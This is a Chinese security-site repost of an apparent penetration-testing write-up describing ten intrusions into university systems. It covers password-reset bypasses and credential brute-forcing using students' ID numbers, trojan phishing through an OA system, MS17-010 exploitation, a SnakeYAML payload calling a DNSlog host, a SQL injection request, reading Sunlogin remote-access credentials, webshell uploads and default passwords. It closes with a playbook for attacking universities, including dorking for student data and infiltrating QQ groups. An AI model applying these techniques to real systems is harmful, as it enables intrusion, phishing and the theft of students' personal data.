教育行业渗透打点

admin 2024年7月9日07:50:59评论19 views字数 3059阅读10分11秒阅读模式
 

01

OA系统密码找回

找回密码

系统使用说明文档中发现登录账号 600030

教育行业渗透打点

密码找回,找回方式选择密保问题

教育行业渗透打点

问题选择出生地,密保问题答案填写高校所在地

教育行业渗透打点

即可修改密码

教育行业渗透打点

修改密码,即可以图文信息中心的身份登录OA系统

教育行业渗透打点

在文件中找到1400多名学生的敏感信息文件,其中存在手机号、身份证号、学号,可以组合密码本进行统一身份认证系统的爆破登录,默认密码为身份证后六位

教育行业渗透打点

成功登录一部分账号

教育行业渗透打点

登录VPN

进行内网扫描,利用MS17010拿下C段多台主机权限

教育行业渗透打点

钓鱼

利用OA系统的通讯功能,散播木马

教育行业渗透打点

获取多台机器权限

教育行业渗透打点

02

逻辑漏洞修改密码

GitHub密码泄漏

GitHub泄漏学号密码

教育行业渗透打点

但账号已被禁用

教育行业渗透打点

获取学号手机号

存在注册功能的网站注册用户,然后登录

教育行业渗透打点

通过以下接口获得用户ID /User/GetUserListByKeyWord

教育行业渗透打点

可以通过以下接口遍历用户ID,获取任意用户的姓名 手机号 邮箱等敏感信息

/User/Tip?time61&id=caec35e7-9956-4f68-98bc-e2aee73ebda5&_=1664438691592

获取多组学号、姓名、手机号

教育行业渗透打点

修改密码

点击同意门户的忘记密码功能,输入上面得到的学号

教育行业渗透打点

输入手机号,点击获取验证码并抓包

教育行业渗透打点

记录回包内容

"datas":"{"sign":"407ec6dc275f4766a4525e059a60ca16"}","code":"0","message":"获取成功"

随意输入验证码,点击下一步,并把上面的流量包直接返回

教育行业渗透打点

可以看到页面跳转到了设置密码

教育行业渗透打点

成功更改密码

教育行业渗透打点

79个应用,通过其中一个aspx站SQL注入拿到shell

教育行业渗透打点

03

Github泄漏账号密码

账号密码

1、GitHub搜索"学校域名" "password" 发现邮箱账号密码

教育行业渗透打点

2、登录邮箱发现手机号身份证号

教育行业渗透打点

统一门户

3、手机号加邮箱密码直接登录统一门户

教育行业渗透打点

泛微OA

跳转到泛微OA,文件上传GetShell

教育行业渗透打点

教育行业渗透打点

04

向日葵密码读取

heapdump文件泄漏

直接下载heapdump文件

教育行业渗透打点

读取到mssql账号密码

成功连接mssql服务器,执行xp_cmdshell

C:Program FilesOraySunLoginSunloginClientconfig.ini为向日葵的默认安装配置文件,直接尝试读取

教育行业渗透打点

fastcode将第一位字母去除就为本机识别码,encry_pwd为加密后的本机验证码

教育行业渗透打点

可以使用GitHub解密项目、Sunflower_get_Password进行解密。

解密后成功连接目标主机服务器

教育行业渗透打点

05

若依漏洞GetShell

1、某学院首页

教育行业渗透打点

2、/login,访问后台页面,发现为若依框架,admin/admin@123直接登录后台

教育行业渗透打点

定时任务命令执行

以管理员权限登录在定时任务处新增

org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager
[ !!java.net.URLClassLoader [[ !!java.net.URL
["ftp://ceshi.bdtmos.dnslog.cn"] ]] ]')运行任务

教育行业渗透打点DNSlog平台收到请求

教育行业渗透打点

shiro 反序列化漏洞

工具直接开扫,成功注入内存马

教育行业渗透打点

连接内存马

教育行业渗透打点

发现历史入侵痕迹,发现fscan黑客漏扫工具

教育行业渗透打点

SQL注入

sql注入当时也懒得去尝试,估计也是存在的

/system/role/list

/system/role/export

/system/dept/edit

POST /system/role/list HTTP/1.1Host: Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=e9f143b9-3c3d-4acb-96a4-93c7367a98e9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 75params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))
06

FCKeditor上传文件GetShell

1、扫描目录发现存在FCKeditor目录

教育行业渗透打点

2、直接找到上传目录

教育行业渗透打点

3、上传aspx木马

教育行业渗透打点

成功连接

教育行业渗透打点

07

任意文件上传

根据学校名称及域名进行编排密码本,爆破登录admin账号

教育行业渗透打点

上传点任意文件上传GetShell

教育行业渗透打点

08

S2反序列化漏洞GetShell

1、目标网站存在S2框架

教育行业渗透打点

2、直接使用工具进行扫描,进而获取权限进行内网渗透

教育行业渗透打点

09

逻辑漏洞

找回密码

1、某站点找回密码处,短信验证码直接出现在回包中

教育行业渗透打点

2、谷歌语法搜索 "XX大学" "手机号" filetype:xls 找到一些手机号码

教育行业渗透打点

3、找回功能-修改密码-登录系统,发现是一个学校党务的测试系统

教育行业渗透打点

但其中数据是真实的,有上千份姓名、手机号、学号、身份证等信息

教育行业渗透打点

统一门户

使用学号加身份证后六位直接登录统一服务平台

教育行业渗透打点

10

geoserver弱口令

8085端口geoserver,进入登陆页面,使用默认账号密码admin/geoserver成功登录后台。

教育行业渗透打点

获取数据库密码

登录后进入配置页面,点击查看其中的数据存储

教育行业渗透打点

F12查看网页源代码,读取PostgreSQL密码:

教育行业渗透打点

撞库

同时发现目标ip还对外开启了mysql数据库,使用root和上文获取到的密码,成功连接上。

教育行业渗透打点

在其中一个log表中发现了账号和MD5加密的密码。

教育行业渗透打点

GetShell

8888端口后台登录页,使用数据库中获取到的账号密码成功登录后台,发现是个金碟的系统,然后使用了文件上传漏洞,成功getshell(截图和payload有点敏感,就不放了)

教育行业渗透打点

00

总结

对于高校的渗透可以从以下几点入手

1、VPN弱口令,GitHub泄漏是重灾区,可以搜索"学校域名" "password"

2、高校的站点一般比较老旧,aspx的站点比较多,可以多关注一下SQL注入,大多数的后台都存在SQL注入。

3、多扫下目录,有些存在各种编辑器的漏洞,但是一些漏洞可能是伪修复了,比如说ueditor的文件上传,可能只是把参数名更换了,只要找到正确的参数名就可以继续利用。

4、百度谷歌高级搜索学号文件,多收集一些账号,搜集网站的使用说明文件,其中有对密码组成进行说明,如身份证后六位等,针对一些管理员的账号进行密码的编排

5、QQ官方群有一些敏感文件,可以使用上面搜集到的信息混入其中

总结起来就是多信息收集,信息收集yyds

 

原文始发于微信公众号(flower安全):总结|教育行业渗透打点

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月9日07:50:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   教育行业渗透打点https://cn-sec.com/archives/2933498.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息